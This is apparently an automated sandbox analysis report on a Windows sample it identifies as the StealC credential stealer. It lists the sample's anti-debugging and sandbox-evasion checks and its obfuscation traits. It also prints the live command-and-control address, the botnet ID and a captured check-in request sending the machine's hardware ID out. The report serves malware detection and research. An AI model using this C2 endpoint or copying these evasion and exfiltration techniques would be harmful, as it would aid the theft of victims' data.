Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A64910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_00A5E430
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_00A5ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_00A64570
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00A63EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A516D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5BE70

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A51160 GetSystemInfo,ExitProcess,

1_2_00A51160

Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWm0>
Source: file.exe, 00000001.00000002.1365721662.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1322360305.00000000014B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.0000000001473000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware7
Source: file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A545C0 VirtualProtect ?,00000004,00000100,00000000

1_2_00A545C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

1_2_00A69860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A69750 mov eax, dword ptr fs:[00000030h]

1_2_00A69750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

1_2_00A678E0

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A69600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

1_2_00A69600

Source: file.exe, file.exe, 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: )Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

1_2_00A67B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A67980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

1_2_00A67980

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A67850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

1_2_00A67850

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A67A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

1_2_00A67A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 1.2.file.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1295074155.0000000005350000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Found malware configuration

Source: 1.2.file.exe.a50000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	1_2_00A5C820
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A59AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00A59AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A57240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00A57240
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A59B60 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00A59B60
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A68EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_00A68EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	1_2_00A638B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A64910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	1_2_00A5E430
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	1_2_00A5ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	1_2_00A64570
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	1_2_00A63EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A516D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	1_2_00A5DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	1_2_00A5BE70

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 30 37 35 35 39 37 32 46 38 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="hwid"B0755972F8951117388365------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build"doma------BAFCGIJDAFBKFIECBGCA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A54880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

1_2_00A54880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpE
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpU
Source: file.exe, 00000001.00000002.1365721662.0000000001480000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/u8
Source: file.exe, 00000001.00000002.1365721662.000000000142E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37s

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB	1_2_00DB88AB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00D7819F	1_2_00D7819F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E04941	1_2_00E04941
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00CF1960	1_2_00CF1960
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00D92176	1_2_00D92176
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E16B3E	1_2_00E16B3E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E1DB09	1_2_00E1DB09
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E20C63	1_2_00E20C63
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DC3558	1_2_00DC3558
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E18575	1_2_00E18575
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E0ED2D	1_2_00E0ED2D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E22699	1_2_00E22699
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E11FBE	1_2_00E11FBE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DBBF4D	1_2_00DBBF4D

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00A545C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: aabwzlbm ZLIB complexity 0.9949325273449205

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A68680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00A68680

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00A63720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

1_2_00A63720

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1864704 > 1048576

Source: file.exe

Static PE information: Raw size of aabwzlbm is bigger than: 0x100000 < 0x1a1200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 1.2.file.exe.a50000.0.unpack :EW;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;aabwzlbm:EW;cxkmbtsd:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

1_2_00A69860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1cf11f should be: 0x1d06b3

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: aabwzlbm
Source: file.exe	Static PE information: section name: cxkmbtsd
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE50CA push 62950C49h; mov dword ptr [esp], edi	1_2_00EE50F2
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00F090C0 push ebx; mov dword ptr [esp], 2CFC6694h	1_2_00F09067
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E288D3 push 1D64D53Ah; mov dword ptr [esp], esi	1_2_00E28932
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E288D3 push 06744E82h; mov dword ptr [esp], ecx	1_2_00E2897B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E288D3 push ecx; mov dword ptr [esp], eax	1_2_00E289EC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE90A6 push 1EA32B71h; mov dword ptr [esp], eax	1_2_00EE90C7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE90A6 push ecx; mov dword ptr [esp], 255517EBh	1_2_00EE90DE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAC0B9 push esi; mov dword ptr [esp], eax	1_2_00EAC0CA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAC0B9 push edx; mov dword ptr [esp], 4382B9D1h	1_2_00EAC0FF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EAC0B9 push 398F2B31h; mov dword ptr [esp], ecx	1_2_00EAC175
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB08BC push 0D820FB2h; mov dword ptr [esp], ecx	1_2_00EB08F7
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EB08BC push 7AA7114Eh; mov dword ptr [esp], ebx	1_2_00EB096A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E9588B push eax; mov dword ptr [esp], ecx	1_2_00E958FE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EE5889 push ebx; mov dword ptr [esp], edi	1_2_00EE58AC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push eax; mov dword ptr [esp], 18C56015h	1_2_00DB897E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push esi; mov dword ptr [esp], eax	1_2_00DB89E3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push edi; mov dword ptr [esp], 9521C58Bh	1_2_00DB8A36
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push 4B3D91B8h; mov dword ptr [esp], ecx	1_2_00DB8A6E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00DB88AB push 7A122765h; mov dword ptr [esp], ebx	1_2_00DB8A98
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E2F892 push edi; mov dword ptr [esp], 57075211h	1_2_00E300C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EC6898 push 7AE67896h; mov dword ptr [esp], edi	1_2_00EC68D2
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00A6B035 push ecx; ret	1_2_00A6B048
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_010F01AE push edx; mov dword ptr [esp], 7565A34Bh	1_2_010F01F1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_010F01AE push 5D8E4FC7h; mov dword ptr [esp], edx	1_2_010F02C5
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00F1405B push 6ED1F919h; mov dword ptr [esp], ebp	1_2_00F1406A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00EFF05D push edx; mov dword ptr [esp], edi	1_2_00EFFC1F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00ECB833 push ebp; mov dword ptr [esp], 72633DF6h	1_2_00ECB863
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00F3D81A push ebx; mov dword ptr [esp], edx	1_2_00F3D831
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E5D9FC push ecx; mov dword ptr [esp], 2FFF5BD7h	1_2_00E5DA28
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E881C9 push 6F824FABh; mov dword ptr [esp], ebp	1_2_00E88208
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00E881C9 push 35C83454h; mov dword ptr [esp], ebp	1_2_00E8821E

Source: file.exe

Static PE information: section name: aabwzlbm entropy: 7.952978260214906

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
